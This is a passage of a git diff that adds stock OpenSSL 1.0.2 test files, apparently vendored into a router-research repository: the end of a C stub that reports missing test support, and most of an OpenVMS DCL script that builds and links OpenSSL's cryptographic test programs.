+#include <openssl/crypto.h>
+
+int main(int argc, char *argv[])
+{
+    char *p, *q = 0, *program;
+
+    p = strrchr(argv[0], '/');
+    if (!p)
+        p = strrchr(argv[0], '\\');
+#ifdef OPENSSL_SYS_VMS
+    if (!p)
+        p = strrchr(argv[0], ']');
+    if (p)
+        q = strrchr(p, '>');
+    if (q)
+        p = q;
+    if (!p)
+        p = strrchr(argv[0], ':');
+    q = 0;
+#endif
+    if (p)
+        p++;
+    if (!p)
+        p = argv[0];
+    if (p)
+        q = strchr(p, '.');
+    if (p && !q)
+        q = p + strlen(p);
+
+    if (!p)
+        program = BUF_strdup("(unknown)");
+    else {
+        program = OPENSSL_malloc((q - p) + 1);
+        strncpy(program, p, q - p);
+        program[q - p] = '\0';
+    }
+
+    for (p = program; *p; p++)
+        if (islower((unsigned char)(*p)))
+            *p = toupper((unsigned char)(*p));
+
+    q = strstr(program, "TEST");
+    if (q > p && q[-1] == '_')
+        q--;
+    *q = '\0';
+
+    printf("No %s support\n", program);
+
+    OPENSSL_free(program);
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/maketests.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/maketests.com
new file mode 100644
index 0000000..7e2d939
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/maketests.com
@@ -0,0 +1,1092 @@
+$!
+$!  MAKETESTS.COM
+$!  Written By:  Robert Byer
+$!               Vice-President
+$!               A-Com Computing, Inc.
+$!               byer@mail.all-net.net
+$!
+$!  Changes by Richard Levitte <richard@levitte.org>
+$!             Zoltan Arpadffy <arpadffy@polarhome.com>
+$!
+$!  This command files compiles and creates all the various different
+$!  "test" programs for the different types of encryption for OpenSSL.
+$!  It was written so it would try to determine what "C" compiler to
+$!  use or you can specify which "C" compiler to use.
+$!
+$!  The test "executables" will be placed in a directory called
+$!  [.xxx.EXE.TEST] where "xxx" denotes ALPHA, IA64, or VAX, depending
+$!  on your machine architecture.
+$!
+$!  Specify DEBUG or NODEBUG P1 to compile with or without debugger
+$!  information.
+$!
+$!  Specify which compiler at P2 to try to compile under.
+$!
+$!	   VAXC	 For VAX C.
+$!	   DECC	 For DEC C.
+$!	   GNUC	 For GNU C.
+$!
+$!  If you don't specify a compiler, it will try to determine which
+$!  "C" compiler to use.
+$!
+$!  P3, if defined, sets a TCP/IP library to use, through one of the following
+$!  keywords:
+$!
+$!	UCX		for UCX
+$!	SOCKETSHR	for SOCKETSHR+NETLIB
+$!
+$!  P4, if defined, sets a compiler thread NOT needed on OpenVMS 7.1 (and up)
+$!
+$!
+$!  P5, if defined, specifies the C pointer size.  Ignored on VAX.
+$!      ("64=ARGV" gives more efficient code with HP C V7.3 or newer.)
+$!      Supported values are:
+$!
+$!      ""       Compile with default (/NOPOINTER_SIZE)
+$!      32       Compile with /POINTER_SIZE=32 (SHORT)
+$!      64       Compile with /POINTER_SIZE=64[=ARGV] (LONG[=ARGV])
+$!               (Automatically select ARGV if compiler supports it.)
+$!      64=      Compile with /POINTER_SIZE=64 (LONG).
+$!      64=ARGV  Compile with /POINTER_SIZE=64=ARGV (LONG=ARGV).
+$!
+$!  P6, if defined, specifies a directory where ZLIB files (zlib.h,
+$!  libz.olb) may be found.  Optionally, a non-default object library
+$!  name may be included ("dev:[dir]libz_64.olb", for example).
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$! Define A TCP/IP Library That We Will Need To Link To.
+$! (That is, If We Need To Link To One.)
+$!
+$ TCPIP_LIB = ""
+$ ZLIB_LIB = ""
+$!
+$! Check Which Architecture We Are Using.
+$!
+$ if (f$getsyi( "cpu") .lt. 128)
+$ then
+$    ARCH = "VAX"
+$ else
+$    ARCH = f$edit( f$getsyi( "ARCH_NAME"), "UPCASE")
+$    if (ARCH .eqs. "") then ARCH = "UNK"
+$ endif
+$!
+$ ARCHD = ARCH
+$ LIB32 = "32"
+$ OPT_FILE = ""
+$ POINTER_SIZE = ""
+$!
+$! Check To Make Sure We Have Valid Command Line Parameters.
+$!
+$ GOSUB CHECK_OPTIONS
+$!
+$! Define The OBJ and EXE Directories.
+$!
+$ OBJ_DIR := SYS$DISK:[-.'ARCHD'.OBJ.TEST]
+$ EXE_DIR := SYS$DISK:[-.'ARCHD'.EXE.TEST]
+$!
+$! Specify the destination directory in any /MAP option.
+$!
+$ if (LINKMAP .eqs. "MAP")
+$ then
+$   LINKMAP = LINKMAP+ "=''EXE_DIR'"
+$ endif
+$!
+$! Add the location prefix to the linker options file name.
+$!
+$ if (OPT_FILE .nes. "")
+$ then
+$   OPT_FILE = EXE_DIR+ OPT_FILE
+$ endif
+$!
+$! Initialise logical names and such
+$!
+$ GOSUB INITIALISE
+$!
+$! Tell The User What Kind of Machine We Run On.
+$!
+$ WRITE SYS$OUTPUT "Host system architecture: ''ARCHD'"
+$!
+$! Define The CRYPTO-LIB We Are To Use.
+$!
+$ CRYPTO_LIB := SYS$DISK:[-.'ARCHD'.EXE.CRYPTO]SSL_LIBCRYPTO'LIB32'.OLB
+$!
+$! Define The SSL We Are To Use.
+$!
+$ SSL_LIB := SYS$DISK:[-.'ARCHD'.EXE.SSL]SSL_LIBSSL'LIB32'.OLB
+$!
+$! Create the OBJ and EXE Directories, if needed.
+$!
+$ IF (F$PARSE(OBJ_DIR).EQS."") THEN -
+   CREATE /DIRECTORY 'OBJ_DIR'
+$ IF (F$PARSE(EXE_DIR).EQS."") THEN -
+   CREATE /DIRECTORY 'EXE_DIR'
+$!
+$! Check To See If We Have The Proper Libraries.
+$!
+$ GOSUB LIB_CHECK
+$!
+$! Check To See If We Have A Linker Option File.
+$!
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Define The TEST Files.
+$! NOTE: Some might think this list ugly.  However, it's made this way to
+$! reflect the EXE variable in Makefile as closely as possible,
+$! thereby making it fairly easy to verify that the lists are the same.
+$!
+$ TEST_FILES = "BNTEST,ECTEST,ECDSATEST,ECDHTEST,IDEATEST,"+ -
+	       "MD2TEST,MD4TEST,MD5TEST,HMACTEST,WP_TEST,"+ -
+	       "RC2TEST,RC4TEST,RC5TEST,"+ -
+	       "DESTEST,SHATEST,SHA1TEST,SHA256T,SHA512T,"+ -
+	       "MDC2TEST,RMDTEST,"+ -
+	       "RANDTEST,DHTEST,ENGINETEST,"+ -
+	       "BFTEST,CASTTEST,SSLTEST,EXPTEST,DSATEST,RSA_TEST,"+ -
+	       "EVP_TEST,IGETEST,JPAKETEST,SRPTEST,"+ -
+	       "ASN1TEST,V3NAMETEST,HEARTBEAT_TEST,"+ -
+	       "CONSTANT_TIME_TEST"
+$! Should we add MTTEST,PQ_TEST,LH_TEST,DIVTEST,TABTEST as well?
+$!
+$! Additional directory information.
+$ T_D_BNTEST     := [-.crypto.bn]
+$ T_D_ECTEST     := [-.crypto.ec]
+$ T_D_ECDSATEST  := [-.crypto.ecdsa]
+$ T_D_ECDHTEST   := [-.crypto.ecdh]
+$ T_D_IDEATEST   := [-.crypto.idea]
+$ T_D_MD2TEST    := [-.crypto.md2]
+$ T_D_MD4TEST    := [-.crypto.md4]
+$ T_D_MD5TEST    := [-.crypto.md5]
+$ T_D_HMACTEST   := [-.crypto.hmac]
+$ T_D_WP_TEST    := [-.crypto.whrlpool]
+$ T_D_RC2TEST    := [-.crypto.rc2]
+$ T_D_RC4TEST    := [-.crypto.rc4]
+$ T_D_RC5TEST    := [-.crypto.rc5]
+$ T_D_DESTEST    := [-.crypto.des]
+$ T_D_SHATEST    := [-.crypto.sha]
+$ T_D_SHA1TEST   := [-.crypto.sha]
+$ T_D_SHA256T    := [-.crypto.sha]
+$ T_D_SHA512T    := [-.crypto.sha]
+$ T_D_MDC2TEST   := [-.crypto.mdc2]
+$ T_D_RMDTEST    := [-.crypto.ripemd]
+$ T_D_RANDTEST   := [-.crypto.rand]
+$ T_D_DHTEST     := [-.crypto.dh]
+$ T_D_ENGINETEST := [-.crypto.engine]
+$ T_D_BFTEST     := [-.crypto.bf]
+$ T_D_CASTTEST   := [-.crypto.cast]
+$ T_D_SSLTEST    := [-.ssl]
+$ T_D_EXPTEST    := [-.crypto.bn]
+$ T_D_DSATEST    := [-.crypto.dsa]
+$ T_D_RSA_TEST   := [-.crypto.rsa]
+$ T_D_EVP_TEST   := [-.crypto.evp]
+$ T_D_IGETEST    := [-.test]
+$ T_D_JPAKETEST  := [-.crypto.jpake]
+$ T_D_SRPTEST    := [-.crypto.srp]
+$ T_D_V3NAMETEST := [-.crypto.x509v3]
+$ T_D_ASN1TEST   := [-.test]
+$ T_D_HEARTBEAT_TEST := [-.ssl]
+$ T_D_CONSTANT_TIME_TEST := [-.crypto]
+$!
+$ TCPIP_PROGRAMS = ",,"
+$ IF COMPILER .EQS. "VAXC" THEN -
+     TCPIP_PROGRAMS = ",SSLTEST,"
+$!
+$! Define A File Counter And Set It To "0".
+$!
+$ FILE_COUNTER = 0
+$!
+$! Top Of The File Loop.
+$!
+$ NEXT_FILE:
+$!
+$! O.K, Extract The File Name From The File List.
+$!
+$ FILE_NAME = F$ELEMENT(FILE_COUNTER,",",TEST_FILES)
+$!
+$! Check To See If We Are At The End Of The File List.
+$!
+$ IF (FILE_NAME.EQS.",") THEN GOTO FILE_DONE
+$!
+$! Increment The Counter.
+$!
+$ FILE_COUNTER = FILE_COUNTER + 1
+$!
+$! Create The Source File Name.
+$!
+$ SOURCE_FILE = "SYS$DISK:" + T_D_'FILE_NAME' + FILE_NAME + ".C"
+$!
+$! Create The Object File Name.
+$!
+$ OBJECT_FILE = OBJ_DIR + FILE_NAME + ".OBJ"
+$!
+$! Create The Executable File Name.
+$!
+$ EXE_FILE = EXE_DIR + FILE_NAME + ".EXE"
+$ ON WARNING THEN GOTO NEXT_FILE
+$!
+$! Check To See If The File We Want To Compile Actually Exists.
+$!
+$ IF (F$SEARCH(SOURCE_FILE).EQS."")
+$ THEN
+$!
+$!  Tell The User That The File Dosen't Exist.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The File ",SOURCE_FILE," Dosen't Exist."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Exit The Build.
+$!
+$   GOTO EXIT
+$ ENDIF
+$!
+$! Tell The User What We Are Building.
+$!
+$ WRITE SYS$OUTPUT "Building The ",FILE_NAME," Test Program."
+$!
+$! Compile The File.
+$!
+$ ON ERROR THEN GOTO NEXT_FILE
+$ CC /OBJECT='OBJECT_FILE' 'SOURCE_FILE'
+$ ON WARNING THEN GOTO NEXT_FILE
+$!
+$! Check If What We Are About To Compile Works Without A TCP/IP Library.
+$!
+$ IF ((TCPIP_LIB.EQS."").AND.((TCPIP_PROGRAMS-FILE_NAME).NES.TCPIP_PROGRAMS))
+$ THEN
+$!
+$!  Inform The User That A TCP/IP Library Is Needed To Compile This Program.
+$!
+$   WRITE SYS$OUTPUT -
+	  FILE_NAME," Needs A TCP/IP Library.  Can't Link.  Skipping..."
+$   GOTO NEXT_FILE
+$!
+$! End The TCP/IP Library Check.
+$!
+$ ENDIF
+$!
+$! Link The Program, Check To See If We Need To Link With RSAREF Or Not.
+$! Check To See If We Are To Link With A Specific TCP/IP Library.
+$!
+$!  Don't Link With The RSAREF Routines And TCP/IP Library.
+$!
+$ LINK /'DEBUGGER' /'LINKMAP' /'TRACEBACK' /EXECTABLE = 'EXE_FILE' -
+   'OBJECT_FILE', -
+   'SSL_LIB' /LIBRARY, -
+   'CRYPTO_LIB' /LIBRARY -
+   'TCPIP_LIB' -
+   'ZLIB_LIB' -
+   ,'OPT_FILE' /OPTIONS
+$!
+$! Go Back And Do It Again.
+$!
+$ GOTO NEXT_FILE
+$!
+$! All Done With This Library Part.
+$!
+$ FILE_DONE:
+$!
+$! All Done, Time To Exit.
+$!
+$ EXIT:
+$ GOSUB CLEANUP
+$ EXIT
+$!
+$! Check For The Link Option FIle.
+$!
+$ CHECK_OPT_FILE:
+$!
+$! Check To See If We Need To Make A VAX C Option File.
+$!
+$ IF (COMPILER.EQS."VAXC")
+$ THEN
+$!
+$!  Check To See If We Already Have A VAX C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A VAX C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable VAX C Runtime Library.
+!
+SYS$SHARE:VAXCRTL.EXE /SHAREABLE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The VAXC Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A GNU C Option File.
+$!
+$ IF (COMPILER.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If We Already Have A GNU C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    We Need A GNU C Linker Option File.
+$!
+$     CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable C Runtime Library.
+!
+GNU_CC:[000000]GCCLIB.OLB /LIBRARY
+SYS$SHARE:VAXCRTL.EXE /SHAREABLE
+$EOD
+$!
+$!  End The Option File Check.
+$!
+$   ENDIF
+$!
+$! End The GNU C Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Need A DEC C Option File.
+$!
+$ IF (COMPILER.EQS."DECC")
+$ THEN
+$!
+$!  Check To See If We Already Have A DEC C Linker Option File.
+$!
+$   IF (F$SEARCH(OPT_FILE).EQS."")
+$   THEN
+$!
+$!    Figure Out If We Need A non-VAX Or A VAX Linker Option File.
+$!
+$     IF (ARCH.EQS."VAX")
+$     THEN
+$!
+$!      We Need A DEC C Linker Option File For VAX.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File To Link Against 
+! The Sharable DEC C Runtime Library.
+!
+SYS$SHARE:DECC$SHR.EXE /SHAREABLE
+$EOD
+$!
+$!    Else...
+$!
+$     ELSE
+$!
+$!      Create The non-VAX Linker Option File.
+$!
+$       CREATE 'OPT_FILE'
+$DECK
+!
+! Default System Options File For non-VAX To Link Against 
+! The Sharable C Runtime Library.
+!
+SYS$SHARE:CMA$OPEN_LIB_SHR.EXE /SHAREABLE
+SYS$SHARE:CMA$OPEN_RTL.EXE /SHAREABLE
+$EOD
+$!
+$!    End The DEC C Option File Check.
+$!
+$     ENDIF
+$!
+$!  End The Option File Search.
+$!
+$   ENDIF
+$!
+$! End The DEC C Check.
+$!
+$ ENDIF
+$!
+$!  Tell The User What Linker Option File We Are Using.
+$!
+$ WRITE SYS$OUTPUT "Using Linker Option File ",OPT_FILE,"."	
+$!
+$! Time To RETURN.
+$!
+$ RETURN
+$!
+$! Check To See If We Have The Appropiate Libraries.
+$!
+$ LIB_CHECK:
+$!
+$! Look For The Library LIBCRYPTO.OLB.
+$!
+$ IF (F$SEARCH(CRYPTO_LIB).EQS."")
+$ THEN
+$!
+$!  Tell The User We Can't Find The LIBCRYPTO.OLB Library.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "Can't Find The Library ",CRYPTO_LIB,"."
+$   WRITE SYS$OUTPUT "We Can't Link Without It."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Since We Can't Link Without It, Exit.
+$!
+$   EXIT
+$!
+$! End The Crypto Library Check.
+$!
+$ ENDIF
+$!
+$! Look For The Library LIBSSL.OLB.
+$!
+$ IF (F$SEARCH(SSL_LIB).EQS."")
+$ THEN
+$!
+$!  Tell The User We Can't Find The LIBSSL.OLB Library.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "Can't Find The Library ",SSL_LIB,"."
+$   WRITE SYS$OUTPUT "Some Of The Test Programs Need To Link To It."
+$   WRITE SYS$OUTPUT ""
+$!
+$!  Since We Can't Link Without It, Exit.
+$!
+$   EXIT
+$!
+$! End The SSL Library Check.
+$!
+$ ENDIF
+$!
+$! Time To Return.
+$!
+$ RETURN
+$!
+$! Check The User's Options.
+$!
+$ CHECK_OPTIONS:
+$!
+$! Set basic C compiler /INCLUDE directories.
+$!
+$ CC_INCLUDES = "SYS$DISK:[-],SYS$DISK:[-.CRYPTO]"
+$!
+$! Check To See If P1 Is Blank.
+$!
+$ IF (P1.EQS."NODEBUG")
+$ THEN
+$!
+$!  P1 Is NODEBUG, So Compile Without Debugger Information.
+$!
+$   DEBUGGER  = "NODEBUG"
+$   LINKMAP = "NOMAP"
+$   TRACEBACK = "NOTRACEBACK" 
+$   GCC_OPTIMIZE = "OPTIMIZE"
+$   CC_OPTIMIZE = "OPTIMIZE"
+$   WRITE SYS$OUTPUT "No Debugger Information Will Be Produced During Compile."
+$   WRITE SYS$OUTPUT "Compiling With Compiler Optimization."
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Check To See If We Are To Compile With Debugger Information.
+$!
+$   IF (P1.EQS."DEBUG")
+$   THEN
+$!
+$!    Compile With Debugger Information.
+$!
+$     DEBUGGER  = "DEBUG"
+$     LINKMAP = "MAP"
+$     TRACEBACK = "TRACEBACK"
+$     GCC_OPTIMIZE = "NOOPTIMIZE"
+$     CC_OPTIMIZE = "NOOPTIMIZE"
+$     WRITE SYS$OUTPUT "Debugger Information Will Be Produced During Compile."
+$     WRITE SYS$OUTPUT "Compiling Without Compiler Optimization."
+$!
+$!  Else...
+$!
+$   ELSE
+$!
+$!    Tell The User Entered An Invalid Option.
+$!
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ",P1," Is Invalid.  The Valid Options Are:"
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "    DEBUG    :  Compile With The Debugger Information."
+$     WRITE SYS$OUTPUT "    NODEBUG  :  Compile Without The Debugger Information."
+$     WRITE SYS$OUTPUT ""
+$!
+$!    Time To EXIT.
+$!
+$     EXIT
+$!
+$!  End The Valid Argument Check.
+$!
+$   ENDIF
+$!
+$! End The P1 Check.
+$!
+$ ENDIF
+$!
+$! Check P5 (POINTER_SIZE).
+$!
+$ IF (P5 .NES. "") .AND. (ARCH .NES. "VAX")
+$ THEN
+$!
+$   IF (P5 .EQS. "32")
+$   THEN
+$     POINTER_SIZE = " /POINTER_SIZE=32"
+$   ELSE
+$     POINTER_SIZE = F$EDIT( P5, "COLLAPSE, UPCASE")
+$     IF ((POINTER_SIZE .EQS. "64") .OR. -
+       (POINTER_SIZE .EQS. "64=") .OR. -
+       (POINTER_SIZE .EQS. "64=ARGV"))
+$     THEN
+$       ARCHD = ARCH+ "_64"
+$       LIB32 = ""
+$       IF (F$EXTRACT( 2, 1, POINTER_SIZE) .EQS. "=")
+$       THEN
+$!        Explicit user choice: "64" or "64=ARGV".
+$         IF (POINTER_SIZE .EQS. "64=") THEN POINTER_SIZE = "64"
+$       ELSE
+$         SET NOON
+$         DEFINE /USER_MODE SYS$OUTPUT NL:
+$         DEFINE /USER_MODE SYS$ERROR NL:
+$         CC /NOLIST /NOOBJECT /POINTER_SIZE=64=ARGV NL:
+$         IF ($STATUS .AND. %X0FFF0000) .EQ. %X00030000
+$         THEN
+$           ! If we got here, it means DCL complained like this:
+$           ! %DCL-W-NOVALU, value not allowed - remove value specification
+$           !  \64=\
+$           !
+$           ! If the compiler was run, logicals defined in /USER would
+$           ! have been deassigned automatically.  However, when DCL
+$           ! complains, they aren't, so we do it here (it might be
+$           ! unnecessary, but just in case there will be another error
+$           ! message further on that we don't want to miss)
+$           DEASSIGN /USER_MODE SYS$ERROR
+$           DEASSIGN /USER_MODE SYS$OUTPUT
+$         ELSE
+$           POINTER_SIZE = POINTER_SIZE + "=ARGV"
+$         ENDIF
+$         SET ON
+$       ENDIF
+$       POINTER_SIZE = " /POINTER_SIZE=''POINTER_SIZE'"
+$     ELSE
+$!
+$!      Tell The User Entered An Invalid Option.
+$!
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", P5, -
+         " Is Invalid.  The Valid Options Are:"
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT -
+         "    """"  :  Compile with default (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    32  :  Compile with 32-bit (short) pointers."
+$       WRITE SYS$OUTPUT -
+         "    64       :  Compile with 64-bit (long) pointers (auto ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=      :  Compile with 64-bit (long) pointers (no ARGV)."
+$       WRITE SYS$OUTPUT -
+         "    64=ARGV  :  Compile with 64-bit (long) pointers (ARGV)."
+$       WRITE SYS$OUTPUT ""
+$! 
+$!      Time To EXIT.
+$!
+$       EXIT
+$!
+$     ENDIF
+$!
+$   ENDIF
+$!
+$! End The P5 (POINTER_SIZE) Check.
+$!
+$ ENDIF
+$!
+$! Check To See If P2 Is Blank.
+$!
+$ IF (P2.EQS."")
+$ THEN
+$!
+$!  O.K., The User Didn't Specify A Compiler, Let's Try To
+$!  Find Out Which One To Use.
+$!
+$!  Check To See If We Have GNU C.
+$!
+$   IF (F$TRNLNM("GNU_CC").NES."")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     P2 = "GNUC"
+$!
+$!  End The GNU C Compiler Check.
+$!
+$   ELSE
+$!
+$!  Check To See If We Have VAXC Or DECC.
+$!
+$     IF (ARCH.NES."VAX").OR.(F$TRNLNM("DECC$CC_DEFAULT").NES."")
+$     THEN 
+$!
+$!      Looks Like DECC, Set To Use DECC.
+$!
+$       P2 = "DECC"
+$!
+$!      Else...
+$!
+$     ELSE
+$!
+$!      Looks Like VAXC, Set To Use VAXC.
+$!
+$       P2 = "VAXC"
+$!
+$!    End The VAXC Compiler Check.
+$!
+$     ENDIF
+$!
+$!  End The DECC & VAXC Compiler Check.
+$!
+$   ENDIF
+$!
+$!  End The Compiler Check.
+$!
+$ ENDIF
+$!
+$! Check To See If We Have A Option For P3.
+$!
+$ IF (P3.EQS."")
+$ THEN
+$!
+$!  Find out what socket library we have available
+$!
+$   IF F$PARSE("SOCKETSHR:") .NES. ""
+$   THEN
+$!
+$!    We have SOCKETSHR, and it is my opinion that it's the best to use.
+$!
+$     P3 = "SOCKETSHR"
+$!
+$!    Tell the user
+$!
+$     WRITE SYS$OUTPUT "Using SOCKETSHR for TCP/IP"
+$!
+$!    Else, let's look for something else
+$!
+$   ELSE
+$!
+$!    Like UCX (the reason to do this before Multinet is that the UCX
+$!    emulation is easier to use...)
+$!
+$     IF F$TRNLNM("UCX$IPC_SHR") .NES. "" -
+	 .OR. F$PARSE("SYS$SHARE:UCX$IPC_SHR.EXE") .NES. "" -
+	 .OR. F$PARSE("SYS$LIBRARY:UCX$IPC.OLB") .NES. ""
+$     THEN
+$!
+$!	Last resort: a UCX or UCX-compatible library
+$!
+$	P3 = "UCX"
+$!
+$!      Tell the user
+$!
+$       WRITE SYS$OUTPUT "Using UCX or an emulation thereof for TCP/IP"
+$!
+$!	That was all...
+$!
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$! Set Up Initial CC Definitions, Possibly With User Ones
+$!
+$ CCDEFS = "TCPIP_TYPE_''P3'"
+$ IF F$TYPE(USER_CCDEFS) .NES. "" THEN CCDEFS = CCDEFS + "," + USER_CCDEFS
+$ CCEXTRAFLAGS = ""
+$ IF F$TYPE(USER_CCFLAGS) .NES. "" THEN CCEXTRAFLAGS = USER_CCFLAGS
+$ CCDISABLEWARNINGS = "" !!! "LONGLONGTYPE,LONGLONGSUFX,FOUNDCR"
+$ IF F$TYPE(USER_CCDISABLEWARNINGS) .NES. "" THEN -
+	CCDISABLEWARNINGS = CCDISABLEWARNINGS + "," + USER_CCDISABLEWARNINGS
+$!
+$! Check To See If We Have A ZLIB Option.
+$!
+$ ZLIB = P6
+$ IF (ZLIB .NES. "")
+$ THEN
+$!
+$!  Check for expected ZLIB files.
+$!
+$   err = 0
+$   file1 = f$parse( "zlib.h", ZLIB, , , "SYNTAX_ONLY")
+$   if (f$search( file1) .eqs. "")
+$   then
+$     WRITE SYS$OUTPUT ""
+$     WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     WRITE SYS$OUTPUT "    Can't find header: ''file1'"
+$     err = 1
+$   endif
+$   file1 = f$parse( "A.;", ZLIB)- "A.;"
+$!
+$   file2 = f$parse( ZLIB, "libz.olb", , , "SYNTAX_ONLY")
+$   if (f$search( file2) .eqs. "")
+$   then
+$     if (err .eq. 0)
+$     then
+$       WRITE SYS$OUTPUT ""
+$       WRITE SYS$OUTPUT "The Option ", ZLIB, " Is Invalid."
+$     endif
+$     WRITE SYS$OUTPUT "    Can't find library: ''file2'"
+$     WRITE SYS$OUTPUT ""
+$     err = err+ 2
+$   endif
+$   if (err .eq. 1)
+$   then
+$     WRITE SYS$OUTPUT ""
+$   endif
+$!
+$   if (err .ne. 0)
+$   then
+$     GOTO EXIT
+$   endif
+$!
+$   CCDEFS = """ZLIB=1"", "+ CCDEFS
+$   CC_INCLUDES = CC_INCLUDES+ ", "+ file1
+$   ZLIB_LIB = ", ''file2' /library"
+$!
+$!  Print info
+$!
+$   WRITE SYS$OUTPUT "ZLIB library spec: ", file2
+$!
+$! End The P8 Check.
+$!
+$ ENDIF
+$!
+$!  Check To See If The User Entered A Valid Parameter.
+$!
+$ IF (P2.EQS."VAXC").OR.(P2.EQS."DECC").OR.(P2.EQS."GNUC")
+$ THEN
+$!
+$!  Check To See If The User Wanted DECC.
+$!
+$   IF (P2.EQS."DECC")
+$   THEN
+$!
+$!    Looks Like DECC, Set To Use DECC.
+$!
+$     COMPILER = "DECC"
+$!
+$!    Tell The User We Are Using DECC.
+$!
+$     WRITE SYS$OUTPUT "Using DECC 'C' Compiler."
+$!
+$!    Use DECC...
+$!
+$     CC = "CC"
+$     IF ARCH.EQS."VAX" .AND. F$TRNLNM("DECC$CC_DEFAULT").NES."/DECC" -
+	 THEN CC = "CC /DECC"
+$     CC = CC + " /''CC_OPTIMIZE' /''DEBUGGER' /STANDARD=RELAXED"+ -
+       "''POINTER_SIZE' /NOLIST /PREFIX=ALL" + -
+       " /INCLUDE=(''CC_INCLUDES') " + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_DECC_OPTIONS.OPT"
+$!
+$!  End DECC Check.
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use VAXC.
+$!
+$   IF (P2.EQS."VAXC")
+$   THEN
+$!
+$!    Looks Like VAXC, Set To Use VAXC.
+$!
+$     COMPILER = "VAXC"
+$!
+$!    Tell The User We Are Using VAX C.
+$!
+$     WRITE SYS$OUTPUT "Using VAXC 'C' Compiler."
+$!
+$!    Compile Using VAXC.
+$!
+$     CC = "CC"
+$     IF ARCH.NES."VAX"
+$     THEN
+$	WRITE SYS$OUTPUT "There is no VAX C on ''ARCH'!"
+$	EXIT
+$     ENDIF
+$     IF F$TRNLNM("DECC$CC_DEFAULT").EQS."/DECC" THEN CC = "CC /VAXC"
+$     CC = CC + "/''CC_OPTIMIZE' /''DEBUGGER' /NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + CCEXTRAFLAGS
+$     CCDEFS = CCDEFS + ",""VAXC"""
+$!
+$!    Define <sys> As SYS$COMMON:[SYSLIB]
+$!
+$     DEFINE /NOLOG SYS SYS$COMMON:[SYSLIB]
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_VAXC_OPTIONS.OPT"
+$!
+$!  End VAXC Check
+$!
+$   ENDIF
+$!
+$!  Check To See If We Are To Use GNU C.
+$!
+$   IF (P2.EQS."GNUC")
+$   THEN
+$!
+$!    Looks Like GNUC, Set To Use GNUC.
+$!
+$     COMPILER = "GNUC"
+$!
+$!    Tell The User We Are Using GNUC.
+$!
+$     WRITE SYS$OUTPUT "Using GNU 'C' Compiler."
+$!
+$!    Use GNU C...
+$!
+$     CC = "GCC /NOCASE_HACK /''GCC_OPTIMIZE' /''DEBUGGER' /NOLIST" + -
+	   "/INCLUDE=(''CC_INCLUDES')" + CCEXTRAFLAGS
+$!
+$!    Define The Linker Options File Name.
+$!
+$     OPT_FILE = "VAX_GNUC_OPTIONS.OPT"
+$!
+$!  End The GNU C Check.
+$!
+$   ENDIF
+$!
+$!  Set up default defines
+$!
+$   CCDEFS = """FLAT_INC=1""," + CCDEFS
+$!
+$!  Finish up the definition of CC.
+$!
+$   IF COMPILER .EQS. "DECC"
+$   THEN
+$     IF CCDISABLEWARNINGS .EQS. ""
+$     THEN
+$       CC4DISABLEWARNINGS = "DOLLARID"
+$     ELSE
+$       CC4DISABLEWARNINGS = CCDISABLEWARNINGS + ",DOLLARID"
+$       CCDISABLEWARNINGS = " /WARNING=(DISABLE=(" + CCDISABLEWARNINGS + "))"
+$     ENDIF
+$     CC4DISABLEWARNINGS = " /WARNING=(DISABLE=(" + CC4DISABLEWARNINGS + "))"
+$   ELSE
+$     CCDISABLEWARNINGS = ""
+$     CC4DISABLEWARNINGS = ""
+$   ENDIF
+$   CC = CC + " /DEFINE=(" + CCDEFS + ")" + CCDISABLEWARNINGS
+$!
+$!  Show user the result
+$!
+$   WRITE /SYMBOL SYS$OUTPUT "Main Compiling Command: ", CC
+$!
+$!  Else The User Entered An Invalid Argument.
+$!
+$ ELSE
+$!
+$!  Tell The User We Don't Know What They Want.
+$!
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "The Option ",P2," Is Invalid.  The Valid Options Are:"
+$   WRITE SYS$OUTPUT ""
+$   WRITE SYS$OUTPUT "    VAXC  :  To Compile With VAX C."
+$   WRITE SYS$OUTPUT "    DECC  :  To Compile With DEC C."
